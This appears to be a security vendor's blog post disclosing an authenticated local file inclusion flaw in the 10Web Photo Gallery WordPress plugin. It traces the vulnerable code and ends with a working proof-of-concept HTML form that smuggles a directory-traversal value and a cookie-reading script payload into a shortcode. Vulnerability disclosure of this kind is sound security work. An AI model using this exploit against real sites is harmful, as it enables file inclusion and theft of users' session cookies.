14 May

Authenticated Local File Inclusion (LFI) Vulnerability in Photo Gallery by 10Web

Earlier today we detailed a vulnerability for our customers in a plugin by 10Web/TenWeb/Web-Dorado, where, while the vulnerability was fixed, the code still wasn’t properly secured. So that made what we then found while looking into the possibility that a vulnerability had also been fixed in their Photo Gallery (Photo Gallery by 10Web) plugin not all that surprising. While trying to confirm that there had been authenticated persistent cross-site scripting (XSS) vulnerability that had been fixed in the plugin we got an error message that indicated there was and we then confirmed still is an authenticated local file inclusion (LFI) vulnerability in the plugin. It really isn’t a great sign as the security of WordPress plugins that you can accidentally run into a vulnerability in a plugin with 300,000+ installs (according to wordpress.org).

The error message indicated that user input from a shortcode generated through the plugin was being passed in to the following line of code in the file /frontend/controllers/controller.php through the variable $view:

13
require_once BWG()->plugin_dir . '/frontend/views/BWGView' . $view . '.php';

That code will run when the plugin’s shortcode is run.

Calling the shortcode will cause the function shortcode() in the file /photo-gallery.php to run and that in turns calls the function front_end() in the same file, which will cause the following line of code to run:

924
$controller = new BWGControllerSite( ucfirst( $params[ 'gallery_type' ] ) );

That line will take the value of the plugin’s shortcode parameter “gallery_type” (which is separate from the shortcode’s attributes) and use it when creating a new instance of the class BWGControllerSite, which gets us back to the first line of code shown:

9
10
11
12
13
  public function __construct( $view = 'Thumbnails' ) {
    require_once BWG()->plugin_dir . "/frontend/models/model.php";
    $this->model = new BWGModelSite();
    require_once BWG()->plugin_dir . "/frontend/views/view.php";
    require_once BWG()->plugin_dir . '/frontend/views/BWGView' . $view . '.php';

Through the user of directory traversal any file with a .php extension can be included as is shown in the proof of concept below.

That isn’t the only security issue here, as despite developing numerous plugins, this developer(s) doesn’t seem to take basic security precautions, so it turns out that anyone logged in to WordPress can create new shortcodes through the plugin. So even though a Subscriber level couldn’t use those normally, they can create them. They are not able to directly exploit them though as we found when testing things out, since the plugin’s shortcode isn’t registered when accessing admin pages (otherwise it could it could be accessed by anyone logged in WordPress through the capability to run shortcodes through WordPress’ AJAX functionality):

147
148
149
if ( !is_admin() ) {
  add_shortcode('Best_Wordpress_Gallery', array($this, 'shortcode'));
}

So normally only users at the Contributor level and above could exploit this.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof of concept will cause a file named test.php in the root directory of the WordPress installation to be included, when logged in as a Contributor.

First create a new shortcode through the plugin.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[nonce]” with the value of “bwg_nonce” on the page /wp-admin/admin-ajax.php?action=shortcode_bwg.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=shortcode_bwg" method="POST">
<input type="hidden" name="bwg_nonce" value="[nonce]" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="tagtext" value='gallery_type=""/../../../../../../test" theme_id="1" use_option_defaults="1" gallery_id="0" tag="0" thumb_width="250" thumb_height="140" image_column_number="5" image_enable_page="1" images_per_page="30" load_more_image_count="30" sort_by="order" order_by="asc" show_search_box="0" placeholder="Search" search_box_width="330" show_sort_images="0" show_tag_box="0" showthumbs_name="0" show_gallery_description="0" image_title="hover" play_icon="1" gallery_download="0" ecommerce_icon="undefined" thumb_click_action="open_lightbox" thumb_link_target="1" popup_fullscreen="1" popup_width="800" popup_height="500" popup_effect="fade" popup_effect_duration="0.1" popup_autoplay="0" popup_interval="2.5" popup_enable_filmstrip="1" popup_filmstrip_height="60" popup_enable_ctrl_btn="1" popup_enable_fullscreen="1" popup_enable_comment="1" popup_enable_email="1" popup_enable_captcha="0" comment_moderation="0" popup_enable_info="1" popup_info_always_show="0" popup_info_full_width="1" autohide_lightbox_navigation="0" popup_hit_counter="0" popup_enable_rate="0" popup_enable_fullsize_image="0" popup_enable_download="0" show_image_counts="0" enable_loop="1" enable_addthis="0" addthis_profile_id="" popup_enable_facebook="1" popup_enable_twitter="1" popup_enable_google="1" popup_enable_pinterest="0" popup_enable_tumblr="0" popup_enable_ecommerce="undefined" watermark_type="none" watermark_link="https://10web.io/" "><script>alert(document.cookie);</script>' />
<input type="hidden" name="currrent_id" value="7" />
<input type="hidden" name="title" value=' gal_title="All images"' />
<input type="hidden" name="bwg_insert" value="1" />
<input type="hidden" name="use_option_defaults" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Now preview a new Post with the following content:

[Best_Wordpress_Gallery id="7" gal_title="All images"]

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.


Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.

Leave a Reply

Your email address will not be published. Required fields are marked *